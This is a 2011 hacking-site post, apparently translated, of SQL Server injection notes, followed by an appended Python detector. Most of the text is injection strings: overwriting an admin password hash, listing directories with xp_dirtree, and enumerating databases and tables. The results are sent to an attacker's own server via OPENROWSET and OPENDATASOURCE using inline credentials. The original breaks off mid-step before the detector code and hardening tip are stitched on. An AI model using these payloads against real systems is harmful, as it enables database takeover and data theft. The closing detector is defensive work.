MSSQL rebound injection notes - vulnerability warning - the black bar safety net

2011-07-05T00:00:00
ID MYHACK58:62201131143
Type myhack58
Reporter Anonymous
Modified 2011-07-05T00:00:00

Description

One night, while I was studying an SA injection point, Hua B sent me some material, so I have tidied it up as a record.

My brain is getting worse and worse, heh.

Change the administrator password (executed at the injection point):

';update [user] set [pwd]='1519804e89226cf9893a05d9e3fc8bbb' where [LogonName]='hmingming';--


Listing directories

create database test    (executed locally; creates the database)

(Executed locally, in the test database created above; creates the table and its fields)

use test; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255))


Test whether the remote server can connect to the local database; executed at the injection point:

insert into openrowset('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima','select id from test.dbo.temp1') select name from master.dbo.sysdatabases--

netstat -an | find "1433"    (executed locally, to confirm the inbound connection on port 1433)

create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255))--

(Executed locally, in the test database, using Query Analyzer)

';drop table temp--    (executed at the injection point, to avoid a conflict with a table that already exists)


(Executed at the injection point; creates the table and fields so that the insert statement below has somewhere to write)

';create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255))--


';insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'D:\www\jiage\',1,1--

(Executed at the injection point: lists the directory and inserts the result into the temp table)


(Executed at the injection point: copies the directory listing into the temp1 table of the local test database)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=test').test.dbo.temp1 select * from temp--


select * from temp1    (executed locally; shows the directory listing, heh heh)

';delete temp--    (executed at the injection point; empties the table)

delete temp1    (executed locally in Query Analyzer; empties the table)

Shame on Black Hand Peng Chao: select * from temp-- somehow got written as select temp from temp--


Guessing tables

The following statements are executed locally:

create database lcx    (creates the database)

Create TABLE ku(name nvarchar(256) null);    (creates the table, so that the database names returned by the query below can be copied into it)

Create TABLE biao(id int NULL,name nvarchar(256) null);    (creates the table, so that the table names returned by the query below can be copied into it)

(nvarchar is the data type, 256 is the data length, and null means the column may be left empty; spelled out for the benefit of newbies. Remember, I love newbies.)


(Executed at the injection point: copies the names of all databases on the server into the newly created ku table; then look at the ku table in the local lcx database, which returns all the rows. There are surprises in store.)

';insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases--


(Executed at the injection point, to get the current database name. Before executing it, clear out the rows left behind locally by the statement above. What, you wouldn't? My god. Run delete ku locally in Query Analyzer, switched to the lcx database.)

';Insert into opendatasource('sqloledb','server=x.x.x.x,1433;uid=fuck;pwd=caonima;database=lcx').lcx.dbo.ku select db_name(0)--


(Executed at the injection point: copies the names of all tables in the current database into the newly created biao table; then look at the biao table in the local lcx database, which returns all the rows. There are surprises in store.)
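As an added defensive example that is not part of the original post: a small Python triage function that scans captured SQL statements (from a query log, audit trace or WAF log; the sample lines below are constructed) for the out-of-band pattern used in both procedures above, an INSERT INTO OPENDATASOURCE/OPENROWSET that pushes query results to a remote SQL Server, and also flags xp_dirtree calls and credentials embedded in SQL text. The host, port and credential values in the samples are assumptions.

```python
import re
from typing import NamedTuple, Optional

# Constructed sample statements (not from the original post) mirroring the shapes
# the article uses: a plain query, an outbound OPENDATASOURCE write, an outbound
# OPENROWSET write, an xp_dirtree call and a harmless local BULK read.
SAMPLES = [
    "select name from master.dbo.sysdatabases",
    "';insert into opendatasource('sqloledb','server=203.0.113.5,1433;uid=app;pwd=secret;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases--",
    "insert into openrowset('sqloledb','server=203.0.113.5,1433;uid=app;pwd=secret','select id from test.dbo.temp1') select name from master.dbo.sysdatabases",
    "';insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'D:\\www\\',1,1--",
    "select * from openrowset(bulk 'c:\\data\\file.csv', single_clob) as t",
]

# INSERT INTO OPENROWSET/OPENDATASOURCE(...) is the outbound direction: rows leave this server.
OUTBOUND_WRITE = re.compile(r"\binsert\s+into\s+(openrowset|opendatasource)\s*\(", re.I)
CONN_SERVER = re.compile(r"\bserver\s*=\s*([^;,']+)(?:,\s*(\d+))?", re.I)
INLINE_CREDS = re.compile(r"\buid\s*=[^;']*;\s*pwd\s*=", re.I)
DIRTREE = re.compile(r"\bxp_dirtree\b", re.I)

class Finding(NamedTuple):
    outbound_write: bool
    target_host: Optional[str]
    target_port: Optional[int]
    inline_credentials: bool
    filesystem_enumeration: bool
    severity: str

def analyze(sql: str) -> Finding:
    """Classify one captured statement; severity is 'high', 'medium' or 'none'."""
    outbound = bool(OUTBOUND_WRITE.search(sql))
    host = port = None
    m = CONN_SERVER.search(sql)
    if outbound and m:
        host = m.group(1).strip()
        port = int(m.group(2)) if m.group(2) else 1433  # SQL Server default when omitted
    creds = bool(INLINE_CREDS.search(sql))
    dirtree = bool(DIRTREE.search(sql))
    if outbound:
        severity = "high"    # query results pushed to a remote SQL Server
    elif dirtree or creds:
        severity = "medium"  # filesystem enumeration or a credential embedded in SQL text
    else:
        severity = "none"
    return Finding(outbound, host, port, creds, dirtree, severity)

if __name__ == "__main__":
    for s in SAMPLES:
        f = analyze(s)
        print(f"{f.severity:6} host={f.target_host} port={f.target_port} creds={f.inline_credentials} dirtree={f.filesystem_enumeration}")
```

On a production server the same condition is removed at the source by leaving the 'Ad Hoc Distributed Queries' option disabled in sp_configure and by not running the application login as sa.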
